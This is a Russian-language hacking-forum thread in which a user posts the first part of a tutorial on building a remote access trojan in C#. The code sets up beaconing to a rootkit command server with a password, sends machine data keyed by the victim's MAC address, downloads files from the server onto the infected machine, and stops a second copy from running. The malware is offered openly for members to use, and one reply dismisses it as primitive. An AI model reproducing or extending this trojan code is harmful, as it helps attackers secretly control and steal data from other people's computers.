Ualm - rat [Пишем свой rat на .net]

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

darknessxxx

Юзер

darknessxxx

Юзер
20 Янв 2017
81
45
Привет всем хуцкерам и не очень, сегодня мы будем делать наброски будущего RAT'ника, будем создавать основные классы для работы, ну а основную логику + сервер будем писать уже в следующих темах(Если они конечно будут).

А теперь об работе, в данном случае мы будем использовать Web-сервер, а общение с ним будет проходить с помощью GETзапросов.
Вот два класса, в которых есть всё что нужно для общения с сервером:



C#:
class HTTPGet
   {
       public static string Indication()
       {
           HttpWebRequest request = (HttpWebRequest)WebRequest.Create(Config.RootKitServer + "/reception.php?" + "id=" + Core.macAddresses() + "&key=" + Config.RootKitServerPassword);
           HttpWebResponse response = (HttpWebResponse)request.GetResponse();
           return new StreamReader(response.GetResponseStream()).ReadToEnd();
       }

       public static void File(string _file, string dir)
       {
           WebClient myWebClient = new WebClient();
           System.Uri Site = new Uri(Config.RootKitServer + @"/files/" + _file);
           myWebClient.DownloadFile(Site, dir + _file);
       }
   }

   class HTTPSend
   {
       public static void Info(string data, string type)
       {
           HttpWebRequest request = (HttpWebRequest)WebRequest.Create(Config.RootKitServer + "/dispatch.php?id=" + Core.macAddresses() + "&key=" + Config.RootKitServerPassword + "&info=" + data);
           HttpWebResponse response = (HttpWebResponse)request.GetResponse();
       }
   }
На всякие пожарные набросал ещё функцию для скачивания файлов с сервера.
Дальше нужно подумать об идентификаторе юзера на сервере, думаю для этого вполне зайдёт MAC компудактера.
А вот так просто с помощью объекта NetworkInterface можно достать наш "уникальный" идентификатор:
C#:
public static string macAddresses()
{
           string macAddresses = "";
           foreach (NetworkInterface nic in NetworkInterface.GetAllNetworkInterfaces())
           {
               if (nic.OperationalStatus == OperationalStatus.Up)
               {
                   macAddresses += nic.GetPhysicalAddress().ToString();
                   break;
               }
           }
           return macAddresses;[/CODE
А вот часть что отвечает за запрет повторного запуска, не хотел рвать жопу с мютексами и зделал просто проверку повторения процесса:
[CODE=csharp]public static bool EmergencyCopy()
       {
           string filename = System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName;
           string name = filename.Substring(0, filename.IndexOf('.'));
           Process[] pr = Process.GetProcesses();
           int count = 0;
           for (int i = 0; i < pr.Length; i++)
           {
               if (pr[i].ProcessName == name || pr[i].ProcessName == name + ".exe")
               {
                   count++;
               }
           }
           if (count > 1) { return true; } else { return false; };
}
Вот и всё, самое интересное будет в логике софта)))
 
Последнее редактирование модератором:

TTT_abdo

Участник

TTT_abdo

Участник
11 Сен 2016
79
180
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Довольно примитивно...
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя